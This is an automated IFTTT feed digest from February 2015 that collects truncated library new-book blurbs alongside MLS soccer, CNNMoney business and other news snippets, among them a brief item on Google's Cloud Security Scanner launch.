Book Release: Five-Minute Relationship Repair Quickly Heal Upsets, Deepen Intimacy, and Use Differences to Strengthen Love by Susan Campbell, PhD; John Grey, PhD.

The Tool Kit No Relationship Should Be Without. Long-term happiness in love depends on a couple’s ability to repair the inevitable rifts and differences, large and small, that occur in any relationship. Neuroscience suggests that relationship upsets are best mended quickly, or they accumulate in long-term memory, increase reactive communication, and become harder to repair successfully. And good repair takes five minutes or less! This book offers practical tools and suggested scripts for resolving



Source: Baltimore County Public Library - New Books

via IFTTT

MLS Update February 20, 2015 at 11:35AM

Former US youth international, FC Dallas goalkeeper Josh Lambo gunning for NFL career | SIDELINE


Josh Lambo is hoping to take his football career swap to the professional level.





from MLSsoccer.com News http://ift.tt/1LkxMoq

via IFTTT

Stocks zoom to record highs on Greek deal

Not even an arctic freeze can stop this bull market. Stocks hit new records in response to a deal to keep Greece from leaving the eurozone.



from Business and financial news - CNNMoney.com http://ift.tt/1AV3pW1

via IFTTT

MLS Update February 20, 2015 at 11:06AM

LA Galaxy encounter rock-star treatment in Ireland as Robbie Keane's exploits open eyes to MLS


DUBLIN – Robbie Keane will always draw a crowd in his hometown, but even he has been taken aback by the reception that the LA Galaxy have received in Dublin.


Once news had spread that the Republic of Ireland captain was bringing his club team to Tallaght Stadium for a preseason friendly with Shamrock Rovers, demand for tickets was unprecedented. Then he arrived home to wild fanfare.





from MLSsoccer.com News http://ift.tt/188BPYQ

via IFTTT

Book Release: Dessert for two : small-batch cookies, brownies, pies, and cakes by Lane, Christina (Food blogger)

Europe gives Greece another four months

Europe has agreed to extend its financial lifeline to Greece by four months provided it comes up with a list of acceptable economic reforms.



from Business and financial news - CNNMoney.com http://ift.tt/1CWiWCE

via IFTTT

MLS Update February 20, 2015 at 10:46AM

New York City FC's David Villa and Manchester City's Sergio Aguero face off again in skills challenge | SIDELINE


David Villa and Sergio Aguero showed off their set-piece skills once again in two additional editions of their skills challenge.


Villa, New York City FC’s first star signing, and Aguero, the star of sister club Manchester City, went head to head in crossbar and corner-kick challenges.





from MLSsoccer.com News http://ift.tt/1AsNPNY

via IFTTT

The Apple car: What we know

Here's all the evidence Apple is secretly building an Apple car -- or an Apple car OS.



from Business and financial news - CNNMoney.com http://ift.tt/1CW9tLJ

via IFTTT

Mother Jones to Fox: Apologize for war remark

The editors of Mother Jones are calling for an apology from Fox News over a comment from Bill O'Reilly.



from Business and financial news - CNNMoney.com http://ift.tt/1w6giuL

via IFTTT

Why Venezuela may be the world's worst economy

Here are five reasons why Venezuela's economy is bordering on the edge of lunacy.



from Business and financial news - CNNMoney.com http://ift.tt/1BvBCLt

via IFTTT

MLS Update February 20, 2015 at 08:31AM

Bonus Points: Getting the bang for your buck with your Fantasy MLS picks


The 2015 Fantasy MLS season has kicked off and rosters are beginning to take shape. Managers must allocate $120 million in budget amongst their roster of 18 players. In the first edition of Bonus Points, we're going to dig deep in the numbers to find ways to help stretch that fantasy dollar.





from MLSsoccer.com News http://ift.tt/1AdeKP1

via IFTTT

Book Release: It will end with us by Savage, Sam, 1940-

"It Will End with Us dismantles the mythic greats of the past--an American South that never was, and a mother's artistic pretensions that never should have been. Sam Savage captures both the frustrations of our degraded world and the tender sympathy it evokes for all our sad efforts to leave something beautiful behind."--



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Vegas stripped: a Raven McShane novel by Caffrey, Stephanie.

Why this tech party isn't like 1999

The Nasdaq is rapidly approaching all-time highs, raising questions about whether or not another bubble is forming in tech stocks.



from Business and financial news - CNNMoney.com http://ift.tt/1MFmdf5

via IFTTT

MLS Update February 20, 2015 at 08:20AM

American Exports: Tim Howard, Everton host EPL stragglers, Alejandro Bedoya's Nantes face Ligue 1 leaders


AMSTERDAM – Several Americans will take part in key matches overseas this weekend, with Tim Howard and Everton aiming to right their Premier League ship against visiting Leicester City.

All times listed in ET.


ENGLISH PREMIER LEAGUE


Brad Guzan – Aston Villa vs. Stoke City (Saturday, 10 am on Premier League Extra Time)





from MLSsoccer.com News http://ift.tt/1F4cklA

via IFTTT

Book Release: How to succeed in therapy : navigating the pitfalls on the path to wellness by Scherz, Jared.

Book Release: Home : the chapter book by West, Tracey, 1965- author.

When aliens invade the earth, Tip, a human girl, and Oh, a banished alien, become friends and begin a search for Tip's mother.



Source: Baltimore County Public Library - New Books

via IFTTT

Google releases Cloud-based Web App Vulnerability Scanner and Assessment Tool

Google on Thursday unleashed its own free web application vulnerability scanner tool, which the search engine giant calls Google Cloud Security Scanner, that will potentially scan developers' applications for common security vulnerabilities on its cloud platform more effectively.

SCANNER ADDRESSES TWO MAJOR WEB VULNERABILITIES

Google launched the Google Cloud Security Scanner in beta. The





from The Hacker News http://ift.tt/1vNWxCd

via IFTTT

Chelsea to invite black man targeted by fans to game

LONDON (AP) Chelsea are planning to invite the black man abused by its supporters at a French metro station before a Champions League game against Paris Saint-Germain this week to its London stadium for the return leg.



from FOX Sports Digital http://ift.tt/1ASi7NC

via IFTTT

Sports Authority said to be at 'high' risk of default

Privately-held Sports Authority could be less than a year away from default on $300 million of its debt according to credit rating agency Moody's.



from Business and financial news - CNNMoney.com http://ift.tt/1ASa2Zb

via IFTTT

Flashback: These 90s jeans are making a comeback

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/1F2ydBw

via IFTTT

Starbucks CEO calls out Giuliani for Obama remarks

Starbucks CEO Howard Schultz blasted former New York Mayor Rudy Giuliani for questioning President Obama's "love" for his country.



from Business and financial news - CNNMoney.com http://ift.tt/1F2ycha

via IFTTT

Book Release: The Secret Wisdom of the Earth by Scotton, Christopher.

Timely and timeless, this is a dramatic and deeply moving novel about an act of violence in a small, Southern town and the repercussions that will forever change a young man's view of human cruelty and compassion. After seeing the death of his younger brother in a terrible home accident, fourteen-year-old Kevin and his grieving mother are sent for the summer to live with Kevin's grandfather. In this peeled-paint coal town deep in Appalachia, Kevin quickly falls in with a half-wild hollow kid nam



Source: Baltimore County Public Library - New Books

via IFTTT

Why flying stinks, and you're still paying more

The price of airline tickets is rising faster than inflation, yet we still have to pay to check a bag.



from Business and financial news - CNNMoney.com http://ift.tt/1Ex1Jj9

via IFTTT

Inside the lives of millionaire debt collectors




from Business and financial news - CNNMoney.com http://ift.tt/185BXs3

via IFTTT

How I fought Olive Garden (and won)

Activist investor James Mitarotonda looks to breathe new life into struggling companies like Darden by investing large sums of money and forcing major change.



from Business and financial news - CNNMoney.com http://ift.tt/185BVk7

via IFTTT